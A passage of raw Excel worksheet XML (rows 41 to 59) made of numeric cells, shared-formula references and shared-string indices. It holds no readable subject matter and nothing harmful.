        <v>30</v>
      </c>
      <c r="N41" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O41" s="29">
        <v>0.0</v>
      </c>
      <c r="P41" s="29">
        <v>1.0</v>
      </c>
      <c r="Q41" s="15"/>
      <c r="R41" s="15"/>
      <c r="S41" s="15"/>
      <c r="T41" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U41" s="5" t="s">
        <v>160</v>
      </c>
      <c r="V41" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W41" s="41" t="s">
        <v>160</v>
      </c>
      <c r="X41" s="18" t="s">
        <v>160</v>
      </c>
      <c r="Y41" s="18" t="s">
        <v>1217</v>
      </c>
      <c r="Z41" s="38" t="s">
        <v>1218</v>
      </c>
      <c r="AA41" s="39" t="s">
        <v>1219</v>
      </c>
      <c r="AB41" s="38" t="s">
        <v>1220</v>
      </c>
      <c r="AC41" s="40">
        <v>249763.0</v>
      </c>
      <c r="AD41" s="5"/>
      <c r="AE41" s="14"/>
      <c r="AF41" s="14"/>
    </row>
    <row r="42">
      <c r="A42" s="6">
        <f t="shared" si="1"/>
        <v>0.1132880472</v>
      </c>
      <c r="B42" s="29">
        <v>1.0</v>
      </c>
      <c r="C42" s="14"/>
      <c r="D42" s="14"/>
      <c r="E42" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F42" s="14"/>
      <c r="G42" s="29">
        <v>4.0</v>
      </c>
      <c r="H42" s="29">
        <v>1217.0</v>
      </c>
      <c r="I42" s="29">
        <v>7245.0</v>
      </c>
      <c r="J42" s="15"/>
      <c r="K42" s="29">
        <v>72119.0</v>
      </c>
      <c r="L42" s="15"/>
      <c r="M42" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N42" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O42" s="29">
        <v>2.0</v>
      </c>
      <c r="P42" s="29">
        <v>0.0</v>
      </c>
      <c r="Q42" s="15"/>
      <c r="R42" s="15"/>
      <c r="S42" s="15"/>
      <c r="T42" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U42" s="5" t="s">
        <v>160</v>
      </c>
      <c r="V42" s="5" t="s">
        <v>56</v>
      </c>
      <c r="W42" s="37" t="s">
        <v>31</v>
      </c>
      <c r="X42" s="37" t="s">
        <v>160</v>
      </c>
      <c r="Y42" s="37" t="s">
        <v>208</v>
      </c>
      <c r="Z42" s="38" t="s">
        <v>1221</v>
      </c>
      <c r="AA42" s="39" t="s">
        <v>1222</v>
      </c>
      <c r="AB42" s="38" t="s">
        <v>1223</v>
      </c>
      <c r="AC42" s="40">
        <v>176996.0</v>
      </c>
      <c r="AD42" s="5"/>
      <c r="AE42" s="14"/>
      <c r="AF42" s="14"/>
    </row>
    <row r="43">
      <c r="A43" s="6">
        <f t="shared" si="1"/>
        <v>0.2645873462</v>
      </c>
      <c r="B43" s="29">
        <v>1.0</v>
      </c>
      <c r="C43" s="29">
        <v>111560.0</v>
      </c>
      <c r="D43" s="14"/>
      <c r="E43" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F43" s="14"/>
      <c r="G43" s="29">
        <v>26.0</v>
      </c>
      <c r="H43" s="29">
        <v>1122.0</v>
      </c>
      <c r="I43" s="29">
        <v>8411.0</v>
      </c>
      <c r="J43" s="15"/>
      <c r="K43" s="15"/>
      <c r="L43" s="15"/>
      <c r="M43" s="14"/>
      <c r="N43" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O43" s="29">
        <v>2.0</v>
      </c>
      <c r="P43" s="29">
        <v>0.0</v>
      </c>
      <c r="Q43" s="15"/>
      <c r="R43" s="15"/>
      <c r="S43" s="15"/>
      <c r="T43" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U43" s="5" t="s">
        <v>160</v>
      </c>
      <c r="V43" s="5" t="s">
        <v>56</v>
      </c>
      <c r="W43" s="37" t="s">
        <v>1122</v>
      </c>
      <c r="X43" s="37" t="s">
        <v>160</v>
      </c>
      <c r="Y43" s="37" t="s">
        <v>208</v>
      </c>
      <c r="Z43" s="38" t="s">
        <v>1224</v>
      </c>
      <c r="AA43" s="39" t="s">
        <v>1225</v>
      </c>
      <c r="AB43" s="38" t="s">
        <v>1226</v>
      </c>
      <c r="AC43" s="40">
        <v>111543.0</v>
      </c>
      <c r="AD43" s="5"/>
      <c r="AE43" s="14"/>
      <c r="AF43" s="14"/>
    </row>
    <row r="44">
      <c r="A44" s="6">
        <f t="shared" si="1"/>
        <v>0.6249598191</v>
      </c>
      <c r="B44" s="29">
        <v>1.0</v>
      </c>
      <c r="C44" s="15"/>
      <c r="D44" s="14"/>
      <c r="E44" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F44" s="14"/>
      <c r="G44" s="29">
        <v>6.0</v>
      </c>
      <c r="H44" s="29">
        <v>2008.0</v>
      </c>
      <c r="I44" s="29">
        <v>215695.0</v>
      </c>
      <c r="J44" s="15"/>
      <c r="K44" s="29">
        <v>98538.0</v>
      </c>
      <c r="L44" s="15"/>
      <c r="M44" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N44" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O44" s="29">
        <v>2.0</v>
      </c>
      <c r="P44" s="29">
        <v>0.0</v>
      </c>
      <c r="Q44" s="15"/>
      <c r="R44" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S44" s="15"/>
      <c r="T44" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U44" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V44" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W44" s="37" t="s">
        <v>113</v>
      </c>
      <c r="X44" s="37" t="s">
        <v>113</v>
      </c>
      <c r="Y44" s="37" t="s">
        <v>1227</v>
      </c>
      <c r="Z44" s="38" t="s">
        <v>1228</v>
      </c>
      <c r="AA44" s="39" t="s">
        <v>1229</v>
      </c>
      <c r="AB44" s="38" t="s">
        <v>1230</v>
      </c>
      <c r="AC44" s="40">
        <v>225054.0</v>
      </c>
      <c r="AD44" s="5"/>
      <c r="AE44" s="14"/>
      <c r="AF44" s="14"/>
    </row>
    <row r="45">
      <c r="A45" s="6">
        <f t="shared" si="1"/>
        <v>0.07879374191</v>
      </c>
      <c r="B45" s="29">
        <v>1.0</v>
      </c>
      <c r="C45" s="29">
        <v>4030.0</v>
      </c>
      <c r="D45" s="14"/>
      <c r="E45" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F45" s="14"/>
      <c r="G45" s="29">
        <v>15.0</v>
      </c>
      <c r="H45" s="29">
        <v>1356.0</v>
      </c>
      <c r="I45" s="29">
        <v>975.0</v>
      </c>
      <c r="J45" s="15"/>
      <c r="K45" s="29">
        <v>975.0</v>
      </c>
      <c r="L45" s="15"/>
      <c r="M45" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N45" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O45" s="29">
        <v>6.0</v>
      </c>
      <c r="P45" s="29">
        <v>1.0</v>
      </c>
      <c r="Q45" s="15"/>
      <c r="R45" s="15"/>
      <c r="S45" s="15"/>
      <c r="T45" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U45" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V45" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W45" s="44" t="s">
        <v>113</v>
      </c>
      <c r="X45" s="37" t="s">
        <v>113</v>
      </c>
      <c r="Y45" s="37" t="s">
        <v>1231</v>
      </c>
      <c r="Z45" s="38" t="s">
        <v>1232</v>
      </c>
      <c r="AA45" s="39" t="s">
        <v>1233</v>
      </c>
      <c r="AB45" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC45" s="40">
        <v>3950.0</v>
      </c>
      <c r="AD45" s="5"/>
      <c r="AE45" s="14"/>
      <c r="AF45" s="14"/>
    </row>
    <row r="46">
      <c r="A46" s="6">
        <f t="shared" si="1"/>
        <v>0.3303319461</v>
      </c>
      <c r="B46" s="29">
        <v>1.0</v>
      </c>
      <c r="C46" s="15"/>
      <c r="D46" s="14"/>
      <c r="E46" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F46" s="14"/>
      <c r="G46" s="29">
        <v>-1.0</v>
      </c>
      <c r="H46" s="29">
        <v>1053.0</v>
      </c>
      <c r="I46" s="29">
        <v>6253.0</v>
      </c>
      <c r="J46" s="15"/>
      <c r="K46" s="15"/>
      <c r="L46" s="15"/>
      <c r="M46" s="15"/>
      <c r="N46" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O46" s="29">
        <v>1.0</v>
      </c>
      <c r="P46" s="29">
        <v>3.0</v>
      </c>
      <c r="Q46" s="15"/>
      <c r="R46" s="15"/>
      <c r="S46" s="15"/>
      <c r="T46" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U46" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V46" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W46" s="37" t="s">
        <v>113</v>
      </c>
      <c r="X46" s="37" t="s">
        <v>113</v>
      </c>
      <c r="Y46" s="37" t="s">
        <v>1234</v>
      </c>
      <c r="Z46" s="38" t="s">
        <v>1235</v>
      </c>
      <c r="AA46" s="39" t="s">
        <v>1236</v>
      </c>
      <c r="AB46" s="38" t="s">
        <v>1237</v>
      </c>
      <c r="AC46" s="40">
        <v>211755.0</v>
      </c>
      <c r="AD46" s="5"/>
      <c r="AE46" s="14"/>
      <c r="AF46" s="14"/>
    </row>
    <row r="47">
      <c r="A47" s="6">
        <f t="shared" si="1"/>
        <v>0.3026982776</v>
      </c>
      <c r="B47" s="29">
        <v>1.0</v>
      </c>
      <c r="C47" s="15"/>
      <c r="D47" s="14"/>
      <c r="E47" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F47" s="14"/>
      <c r="G47" s="29">
        <v>8.0</v>
      </c>
      <c r="H47" s="29">
        <v>9324.0</v>
      </c>
      <c r="I47" s="29">
        <v>55827.0</v>
      </c>
      <c r="J47" s="15"/>
      <c r="K47" s="15"/>
      <c r="L47" s="15"/>
      <c r="M47" s="15"/>
      <c r="N47" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O47" s="29">
        <v>4.0</v>
      </c>
      <c r="P47" s="29">
        <v>6.0</v>
      </c>
      <c r="Q47" s="15"/>
      <c r="R47" s="15"/>
      <c r="S47" s="15"/>
      <c r="T47" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U47" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V47" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W47" s="18" t="s">
        <v>113</v>
      </c>
      <c r="X47" s="18" t="s">
        <v>113</v>
      </c>
      <c r="Y47" s="45"/>
      <c r="Z47" s="38" t="s">
        <v>1238</v>
      </c>
      <c r="AA47" s="39" t="s">
        <v>1239</v>
      </c>
      <c r="AB47" s="38" t="s">
        <v>1240</v>
      </c>
      <c r="AC47" s="40">
        <v>67783.0</v>
      </c>
      <c r="AD47" s="5"/>
      <c r="AE47" s="14"/>
      <c r="AF47" s="14"/>
    </row>
    <row r="48">
      <c r="A48" s="6">
        <f t="shared" si="1"/>
        <v>0.3326649485</v>
      </c>
      <c r="B48" s="29">
        <v>1.0</v>
      </c>
      <c r="C48" s="29">
        <v>65285.0</v>
      </c>
      <c r="D48" s="14"/>
      <c r="E48" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F48" s="14"/>
      <c r="G48" s="29">
        <v>41.0</v>
      </c>
      <c r="H48" s="29">
        <v>5768.0</v>
      </c>
      <c r="I48" s="15"/>
      <c r="J48" s="5" t="s">
        <v>1241</v>
      </c>
      <c r="K48" s="29">
        <v>485.0</v>
      </c>
      <c r="L48" s="15"/>
      <c r="M48" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N48" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O48" s="29">
        <v>5.0</v>
      </c>
      <c r="P48" s="29">
        <v>0.0</v>
      </c>
      <c r="Q48" s="15"/>
      <c r="R48" s="15"/>
      <c r="S48" s="15"/>
      <c r="T48" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U48" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V48" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W48" s="41" t="s">
        <v>113</v>
      </c>
      <c r="X48" s="18" t="s">
        <v>113</v>
      </c>
      <c r="Y48" s="18" t="s">
        <v>212</v>
      </c>
      <c r="Z48" s="38" t="s">
        <v>1242</v>
      </c>
      <c r="AA48" s="39" t="s">
        <v>1243</v>
      </c>
      <c r="AB48" s="38" t="s">
        <v>1174</v>
      </c>
      <c r="AC48" s="40">
        <v>65280.0</v>
      </c>
      <c r="AD48" s="5"/>
      <c r="AE48" s="14"/>
      <c r="AF48" s="14"/>
    </row>
    <row r="49">
      <c r="A49" s="6">
        <f t="shared" si="1"/>
        <v>0.9142219654</v>
      </c>
      <c r="B49" s="29">
        <v>1.0</v>
      </c>
      <c r="C49" s="29">
        <v>244619.0</v>
      </c>
      <c r="D49" s="14"/>
      <c r="E49" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F49" s="14"/>
      <c r="G49" s="29">
        <v>15.0</v>
      </c>
      <c r="H49" s="29">
        <v>2956.0</v>
      </c>
      <c r="I49" s="29">
        <v>155194.0</v>
      </c>
      <c r="J49" s="15"/>
      <c r="K49" s="29">
        <v>235964.0</v>
      </c>
      <c r="L49" s="15"/>
      <c r="M49" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N49" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O49" s="29">
        <v>6.0</v>
      </c>
      <c r="P49" s="29">
        <v>5.0</v>
      </c>
      <c r="Q49" s="15"/>
      <c r="R49" s="15"/>
      <c r="S49" s="15"/>
      <c r="T49" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U49" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V49" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W49" s="41" t="s">
        <v>113</v>
      </c>
      <c r="X49" s="18" t="s">
        <v>113</v>
      </c>
      <c r="Y49" s="18" t="s">
        <v>1244</v>
      </c>
      <c r="Z49" s="38" t="s">
        <v>1245</v>
      </c>
      <c r="AA49" s="39" t="s">
        <v>1246</v>
      </c>
      <c r="AB49" s="38" t="s">
        <v>1247</v>
      </c>
      <c r="AC49" s="40">
        <v>244609.0</v>
      </c>
      <c r="AD49" s="5"/>
      <c r="AE49" s="14"/>
      <c r="AF49" s="14"/>
    </row>
    <row r="50">
      <c r="A50" s="6">
        <f t="shared" si="1"/>
        <v>0.2400810244</v>
      </c>
      <c r="B50" s="29">
        <v>1.0</v>
      </c>
      <c r="C50" s="29">
        <v>55241.0</v>
      </c>
      <c r="D50" s="14"/>
      <c r="E50" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F50" s="14"/>
      <c r="G50" s="29">
        <v>0.0</v>
      </c>
      <c r="H50" s="29">
        <v>1884.0</v>
      </c>
      <c r="I50" s="29">
        <v>43842.0</v>
      </c>
      <c r="J50" s="15"/>
      <c r="K50" s="29">
        <v>1811.0</v>
      </c>
      <c r="L50" s="15"/>
      <c r="M50" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N50" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O50" s="29">
        <v>1.0</v>
      </c>
      <c r="P50" s="29">
        <v>1.0</v>
      </c>
      <c r="Q50" s="15"/>
      <c r="R50" s="15"/>
      <c r="S50" s="15"/>
      <c r="T50" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U50" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V50" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W50" s="41" t="s">
        <v>113</v>
      </c>
      <c r="X50" s="18" t="s">
        <v>113</v>
      </c>
      <c r="Y50" s="18" t="s">
        <v>216</v>
      </c>
      <c r="Z50" s="38" t="s">
        <v>1248</v>
      </c>
      <c r="AA50" s="39" t="s">
        <v>1249</v>
      </c>
      <c r="AB50" s="38" t="s">
        <v>1250</v>
      </c>
      <c r="AC50" s="40">
        <v>55238.0</v>
      </c>
      <c r="AD50" s="5"/>
      <c r="AE50" s="14"/>
      <c r="AF50" s="14"/>
    </row>
    <row r="51">
      <c r="A51" s="6">
        <f t="shared" si="1"/>
        <v>0.1612933789</v>
      </c>
      <c r="B51" s="29">
        <v>1.0</v>
      </c>
      <c r="C51" s="29">
        <v>38778.0</v>
      </c>
      <c r="D51" s="14"/>
      <c r="E51" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F51" s="14"/>
      <c r="G51" s="29">
        <v>5.0</v>
      </c>
      <c r="H51" s="29">
        <v>4378.0</v>
      </c>
      <c r="I51" s="29">
        <v>22425.0</v>
      </c>
      <c r="J51" s="15"/>
      <c r="K51" s="29">
        <v>22425.0</v>
      </c>
      <c r="L51" s="15"/>
      <c r="M51" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N51" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O51" s="29">
        <v>5.0</v>
      </c>
      <c r="P51" s="29">
        <v>0.0</v>
      </c>
      <c r="Q51" s="15"/>
      <c r="R51" s="15"/>
      <c r="S51" s="15"/>
      <c r="T51" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U51" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V51" s="5" t="s">
        <v>56</v>
      </c>
      <c r="W51" s="37" t="s">
        <v>31</v>
      </c>
      <c r="X51" s="37" t="s">
        <v>113</v>
      </c>
      <c r="Y51" s="37" t="s">
        <v>1251</v>
      </c>
      <c r="Z51" s="38" t="s">
        <v>1252</v>
      </c>
      <c r="AA51" s="39" t="s">
        <v>1253</v>
      </c>
      <c r="AB51" s="38" t="s">
        <v>1254</v>
      </c>
      <c r="AC51" s="40">
        <v>38758.0</v>
      </c>
      <c r="AD51" s="5"/>
      <c r="AE51" s="14"/>
      <c r="AF51" s="14"/>
    </row>
    <row r="52">
      <c r="A52" s="6">
        <f t="shared" si="1"/>
        <v>0.1218014214</v>
      </c>
      <c r="B52" s="29">
        <v>1.0</v>
      </c>
      <c r="C52" s="29">
        <v>163593.0</v>
      </c>
      <c r="D52" s="14"/>
      <c r="E52" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F52" s="14"/>
      <c r="G52" s="29">
        <v>0.0</v>
      </c>
      <c r="H52" s="29">
        <v>486.0</v>
      </c>
      <c r="I52" s="29">
        <v>72031.0</v>
      </c>
      <c r="J52" s="15"/>
      <c r="K52" s="29">
        <v>72031.0</v>
      </c>
      <c r="L52" s="15"/>
      <c r="M52" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N52" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O52" s="29">
        <v>1.0</v>
      </c>
      <c r="P52" s="29">
        <v>10.0</v>
      </c>
      <c r="Q52" s="15"/>
      <c r="R52" s="15"/>
      <c r="S52" s="15"/>
      <c r="T52" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U52" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V52" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W52" s="41" t="s">
        <v>61</v>
      </c>
      <c r="X52" s="18" t="s">
        <v>113</v>
      </c>
      <c r="Y52" s="18" t="s">
        <v>1244</v>
      </c>
      <c r="Z52" s="38" t="s">
        <v>1255</v>
      </c>
      <c r="AA52" s="39" t="s">
        <v>1256</v>
      </c>
      <c r="AB52" s="38" t="s">
        <v>1257</v>
      </c>
      <c r="AC52" s="40">
        <v>151973.0</v>
      </c>
      <c r="AD52" s="5"/>
      <c r="AE52" s="14"/>
      <c r="AF52" s="14"/>
    </row>
    <row r="53">
      <c r="A53" s="6">
        <f t="shared" si="1"/>
        <v>0.6126087467</v>
      </c>
      <c r="B53" s="29">
        <v>1.0</v>
      </c>
      <c r="C53" s="15"/>
      <c r="D53" s="14"/>
      <c r="E53" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F53" s="14"/>
      <c r="G53" s="29">
        <v>35.0</v>
      </c>
      <c r="H53" s="29">
        <v>9200.0</v>
      </c>
      <c r="I53" s="29">
        <v>1873.0</v>
      </c>
      <c r="J53" s="15"/>
      <c r="K53" s="15"/>
      <c r="L53" s="15"/>
      <c r="M53" s="15"/>
      <c r="N53" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O53" s="29">
        <v>3.0</v>
      </c>
      <c r="P53" s="29">
        <v>10.0</v>
      </c>
      <c r="Q53" s="15"/>
      <c r="R53" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S53" s="15"/>
      <c r="T53" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U53" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V53" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W53" s="41" t="s">
        <v>160</v>
      </c>
      <c r="X53" s="18" t="s">
        <v>113</v>
      </c>
      <c r="Y53" s="18" t="s">
        <v>216</v>
      </c>
      <c r="Z53" s="38" t="s">
        <v>1258</v>
      </c>
      <c r="AA53" s="39" t="s">
        <v>1259</v>
      </c>
      <c r="AB53" s="38" t="s">
        <v>1260</v>
      </c>
      <c r="AC53" s="40">
        <v>143530.0</v>
      </c>
      <c r="AD53" s="5"/>
      <c r="AE53" s="14"/>
      <c r="AF53" s="14"/>
    </row>
    <row r="54">
      <c r="A54" s="6">
        <f t="shared" si="1"/>
        <v>0.9460978148</v>
      </c>
      <c r="B54" s="29">
        <v>1.0</v>
      </c>
      <c r="C54" s="29">
        <v>176133.0</v>
      </c>
      <c r="D54" s="14"/>
      <c r="E54" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F54" s="14"/>
      <c r="G54" s="29">
        <v>6.0</v>
      </c>
      <c r="H54" s="29">
        <v>1881.0</v>
      </c>
      <c r="I54" s="29">
        <v>122449.0</v>
      </c>
      <c r="J54" s="15"/>
      <c r="K54" s="29">
        <v>6253.0</v>
      </c>
      <c r="L54" s="15"/>
      <c r="M54" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N54" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O54" s="29">
        <v>3.0</v>
      </c>
      <c r="P54" s="29">
        <v>4.0</v>
      </c>
      <c r="Q54" s="15"/>
      <c r="R54" s="15"/>
      <c r="S54" s="15"/>
      <c r="T54" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U54" s="5" t="s">
        <v>113</v>
      </c>
      <c r="V54" s="5" t="s">
        <v>173</v>
      </c>
      <c r="W54" s="37" t="s">
        <v>113</v>
      </c>
      <c r="X54" s="37" t="s">
        <v>61</v>
      </c>
      <c r="Y54" s="37" t="s">
        <v>1097</v>
      </c>
      <c r="Z54" s="38" t="s">
        <v>1261</v>
      </c>
      <c r="AA54" s="39" t="s">
        <v>1262</v>
      </c>
      <c r="AB54" s="38" t="s">
        <v>1263</v>
      </c>
      <c r="AC54" s="40">
        <v>176129.0</v>
      </c>
      <c r="AD54" s="5"/>
      <c r="AE54" s="14"/>
      <c r="AF54" s="14"/>
    </row>
    <row r="55">
      <c r="A55" s="6">
        <f t="shared" si="1"/>
        <v>0.3190661541</v>
      </c>
      <c r="B55" s="29">
        <v>1.0</v>
      </c>
      <c r="C55" s="14"/>
      <c r="D55" s="14"/>
      <c r="E55" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F55" s="14"/>
      <c r="G55" s="29">
        <v>2.0</v>
      </c>
      <c r="H55" s="29">
        <v>519.0</v>
      </c>
      <c r="I55" s="29">
        <v>71103.0</v>
      </c>
      <c r="J55" s="15"/>
      <c r="K55" s="15"/>
      <c r="L55" s="15"/>
      <c r="M55" s="15"/>
      <c r="N55" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O55" s="29">
        <v>3.0</v>
      </c>
      <c r="P55" s="29">
        <v>7.0</v>
      </c>
      <c r="Q55" s="15"/>
      <c r="R55" s="15"/>
      <c r="S55" s="15"/>
      <c r="T55" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U55" s="18" t="s">
        <v>113</v>
      </c>
      <c r="V55" s="5" t="s">
        <v>173</v>
      </c>
      <c r="W55" s="18" t="s">
        <v>113</v>
      </c>
      <c r="X55" s="18" t="s">
        <v>1264</v>
      </c>
      <c r="Y55" s="45"/>
      <c r="Z55" s="38" t="s">
        <v>1265</v>
      </c>
      <c r="AA55" s="39" t="s">
        <v>1266</v>
      </c>
      <c r="AB55" s="38" t="s">
        <v>1267</v>
      </c>
      <c r="AC55" s="40">
        <v>84600.0</v>
      </c>
      <c r="AD55" s="5"/>
      <c r="AE55" s="14"/>
      <c r="AF55" s="14"/>
    </row>
    <row r="56">
      <c r="A56" s="6">
        <f t="shared" si="1"/>
        <v>0.05798831265</v>
      </c>
      <c r="B56" s="29">
        <v>1.0</v>
      </c>
      <c r="C56" s="15"/>
      <c r="D56" s="14"/>
      <c r="E56" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F56" s="14"/>
      <c r="G56" s="29">
        <v>2.0</v>
      </c>
      <c r="H56" s="29">
        <v>89.0</v>
      </c>
      <c r="I56" s="29">
        <v>202160.0</v>
      </c>
      <c r="J56" s="15"/>
      <c r="K56" s="29">
        <v>19891.0</v>
      </c>
      <c r="L56" s="15"/>
      <c r="M56" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N56" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O56" s="29">
        <v>0.0</v>
      </c>
      <c r="P56" s="29">
        <v>1.0</v>
      </c>
      <c r="Q56" s="15"/>
      <c r="R56" s="15"/>
      <c r="S56" s="15"/>
      <c r="T56" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U56" s="43" t="s">
        <v>160</v>
      </c>
      <c r="V56" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W56" s="37" t="s">
        <v>1268</v>
      </c>
      <c r="X56" s="37" t="s">
        <v>1268</v>
      </c>
      <c r="Y56" s="37" t="s">
        <v>1269</v>
      </c>
      <c r="Z56" s="38" t="s">
        <v>1270</v>
      </c>
      <c r="AA56" s="39" t="s">
        <v>1271</v>
      </c>
      <c r="AB56" s="38" t="s">
        <v>1272</v>
      </c>
      <c r="AC56" s="40">
        <v>210055.0</v>
      </c>
      <c r="AD56" s="5"/>
      <c r="AE56" s="14"/>
      <c r="AF56" s="14"/>
    </row>
    <row r="57">
      <c r="A57" s="6">
        <f t="shared" si="1"/>
        <v>0.7393427952</v>
      </c>
      <c r="B57" s="29">
        <v>1.0</v>
      </c>
      <c r="C57" s="29">
        <v>182192.0</v>
      </c>
      <c r="D57" s="14"/>
      <c r="E57" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F57" s="14"/>
      <c r="G57" s="29">
        <v>42.0</v>
      </c>
      <c r="H57" s="29">
        <v>13665.0</v>
      </c>
      <c r="I57" s="29">
        <v>55476.0</v>
      </c>
      <c r="J57" s="15"/>
      <c r="K57" s="29">
        <v>98538.0</v>
      </c>
      <c r="L57" s="15"/>
      <c r="M57" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N57" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O57" s="29">
        <v>2.0</v>
      </c>
      <c r="P57" s="29">
        <v>0.0</v>
      </c>
      <c r="Q57" s="15"/>
      <c r="R57" s="15"/>
      <c r="S57" s="15"/>
      <c r="T57" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U57" s="43" t="s">
        <v>160</v>
      </c>
      <c r="V57" s="5" t="s">
        <v>56</v>
      </c>
      <c r="W57" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="X57" s="37" t="s">
        <v>1268</v>
      </c>
      <c r="Y57" s="37" t="s">
        <v>1273</v>
      </c>
      <c r="Z57" s="38" t="s">
        <v>1274</v>
      </c>
      <c r="AA57" s="39" t="s">
        <v>1275</v>
      </c>
      <c r="AB57" s="38" t="s">
        <v>1276</v>
      </c>
      <c r="AC57" s="40">
        <v>182161.0</v>
      </c>
      <c r="AD57" s="5"/>
      <c r="AE57" s="14"/>
      <c r="AF57" s="14"/>
    </row>
    <row r="58">
      <c r="A58" s="6">
        <f t="shared" si="1"/>
        <v>0.6924275373</v>
      </c>
      <c r="B58" s="29">
        <v>1.0</v>
      </c>
      <c r="C58" s="29">
        <v>190277.0</v>
      </c>
      <c r="D58" s="14"/>
      <c r="E58" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F58" s="14"/>
      <c r="G58" s="29">
        <v>1.0</v>
      </c>
      <c r="H58" s="29">
        <v>213.0</v>
      </c>
      <c r="I58" s="29">
        <v>182051.0</v>
      </c>
      <c r="J58" s="15"/>
      <c r="K58" s="15"/>
      <c r="L58" s="15"/>
      <c r="M58" s="14"/>
      <c r="N58" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O58" s="29">
        <v>2.0</v>
      </c>
      <c r="P58" s="29">
        <v>3.0</v>
      </c>
      <c r="Q58" s="15"/>
      <c r="R58" s="15"/>
      <c r="S58" s="15"/>
      <c r="T58" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U58" s="5" t="s">
        <v>95</v>
      </c>
      <c r="V58" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W58" s="41" t="s">
        <v>160</v>
      </c>
      <c r="X58" s="18" t="s">
        <v>83</v>
      </c>
      <c r="Y58" s="18" t="s">
        <v>83</v>
      </c>
      <c r="Z58" s="38" t="s">
        <v>1277</v>
      </c>
      <c r="AA58" s="39" t="s">
        <v>1278</v>
      </c>
      <c r="AB58" s="38" t="s">
        <v>1279</v>
      </c>
      <c r="AC58" s="40">
        <v>190273.0</v>
      </c>
      <c r="AD58" s="5"/>
      <c r="AE58" s="14"/>
      <c r="AF58" s="14"/>
    </row>
    <row r="59">
      <c r="A59" s="6">
        <f t="shared" si="1"/>
        <v>0.6000564663</v>
      </c>
      <c r="B59" s="29">
        <v>1.0</v>
      </c>
      <c r="C59" s="15"/>
      <c r="D59" s="14"/>
      <c r="E59" s="36" t="s">
